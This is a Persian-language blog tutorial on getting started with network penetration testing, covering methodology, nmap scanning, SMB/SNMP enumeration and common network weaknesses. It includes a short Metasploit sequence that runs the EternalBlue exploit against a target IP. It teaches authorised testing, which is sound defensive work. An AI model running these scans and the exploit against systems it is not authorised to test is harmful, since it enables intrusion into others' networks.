رفتن به محتوا
بازگشت به وبلاگ
امنیت

تست نفوذ شبکه: شروع کار

مقدمه‌ای بر روش‌شناسی تست نفوذ شبکه، ابزارها (nmap، Metasploit) و نحوه شناسایی آسیب‌پذیری‌های رایج.

فروردین ۱۴۰۴
۱۳ دقیقه مطالعه

مقدمه‌ای بر تست نفوذ شبکه

تست نفوذ حملات واقعی را برای یافتن آسیب‌پذیری‌ها قبل از بازیگران مخرب شبیه‌سازی می‌کند. این راهنما متدولوژی و ابزارهای کلیدی را پوشش می‌دهد.

متدولوژی: ۵ مرحله

۱. شناسایی: جمع‌آوری اطلاعات به‌صورت غیرفعال

۲. اسکن: کشف هاست‌های فعال و پورت‌های باز

۳. شمارش: استخراج نسخه‌های سرویس و کاربران

۴. بهره‌برداری: تلاش برای به خطر انداختن سیستم‌ها

۵. گزارش: مستندسازی یافته‌ها و اقدامات اصلاحی

مرحله ۲: اسکن شبکه با Nmap

BASH
# کشف هاست
nmap -sn 192.168.1.0/24

# اسکن کامل پورت با تشخیص نسخه
nmap -sV -sC -p- --min-rate 1000 192.168.1.10 -oN scan.txt

# اسکن UDP (کندتر اما مهم)
nmap -sU --top-ports 100 192.168.1.10

مرحله ۳: شمارش سرویس

BASH
# شمارش SMB
enum4linux -a 192.168.1.10
smbclient -L //192.168.1.10 -N

# شمارش SNMP
snmpwalk -v2c -c public 192.168.1.1

مرحله ۴: بهره‌برداری با Metasploit

BASH
msfconsole
msf6 > search eternalblue
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit > set RHOSTS 192.168.1.10
msf6 exploit > run

آسیب‌پذیری‌های رایج شبکه

  • اعتبارنامه‌های پیش‌فرض روی تجهیزات شبکه
  • فریم‌ور وصله‌نشده (MikroTik، Cisco، Fortigate)
  • رشته Community SNMP «public»
  • Telnet/FTP باز به جای SSH/SFTP
  • شبکه‌های تخت بدون تقسیم‌بندی

گزارش

همیشه مستند کنید: محدوده، متدولوژی، یافته‌ها (با شدت)، اثبات مفهوم، و توصیه‌های اصلاحی. هرگز بدون مجوز کتبی سیستم‌های تولیدی را بهره‌برداری نکنید.